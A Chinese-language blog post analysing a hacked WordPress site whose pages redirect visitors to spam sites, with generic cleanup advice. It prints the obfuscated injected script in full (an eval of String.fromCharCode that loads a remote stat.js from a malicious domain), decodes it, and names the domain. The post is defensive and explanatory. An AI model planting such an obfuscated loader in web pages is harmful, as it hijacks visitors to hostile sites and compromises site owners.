分享一个外贸WordPress网站被挂马恶意跳转的案例

昨天在群里看到有个站长在问WordPress搭建的网站一打开就自动跳转到别人的网站是什么情况。然后奶爸访问他私聊的网址进去看了下。

WordPress感染恶意重定向代码

打开自己的网站，网站内容加载一大半后就会自动跳转到第三方的网站，并且会连续跳好几个网站。

同时跳转过去的网站会要求你给予它通知权限，如下图：

然后分析了下网站的源代码（装了好多插件，导致有好多js啊什么的代码，太乱了）

最终发现下面这串代码有些不正常，问了下站长，不是他自己的也不是他装的那些插件的。

<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

然后奶爸就搜了下这个eval(String.fromCharCode，发现了下面这篇记录文章

记录 – 网站被 HACK！

然后通过jdstiles.com这个网站解析了下上面那串代码的含义。

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

再解析一次上面的数字，出来了下面这个网站

https://blackawardago.com

不用管最后出来的是什么网址，都知道这是网站被黑了。

国外对这个称之为WordPress恶意重定向代码，好像是18年开始流行起来的，下面是奶爸搜资料的时候看到的两篇文章。

https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware

https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net

如果你想知道下你网站是不是也中了这个恶意重定向代码，可以通过下面这个网站检查一下。

https://sitecheck.sucuri.net/

WordPress恶意重定向代码清除方法

当然，如果中了WordPress恶意重定向代码如何清除呢？（因为那站长并没有让我帮忙处理，所以奶爸没有接触到实际代码，下面是分享的一般处理办法）

能看懂代码的解决办法

1. 找出恶意代码，删除。
2. 排查网站所有文件跟代码，看是否还有感染的和不明脚本，删除。
3. 检查数据库是否被感染，如果有，删除感染内容。

看不懂代码的解决办法

1. 花钱找一个看得懂代码的帮你清理，我看上面老外的是108刀/年起。
2. 网站删了重装，确保使用安全的主题跟插件，确保数据库没有被感染，确保服务器安全。

如果看到本文的大佬知道怎么清理这种恶意代码的，或者有清理恶意代码经验的，欢迎留言指教。

最后推荐一款插件：给WordPress装一个防火墙吧！试试 Wordfence

相关知识：做好安全防护避免WordPress网站被黑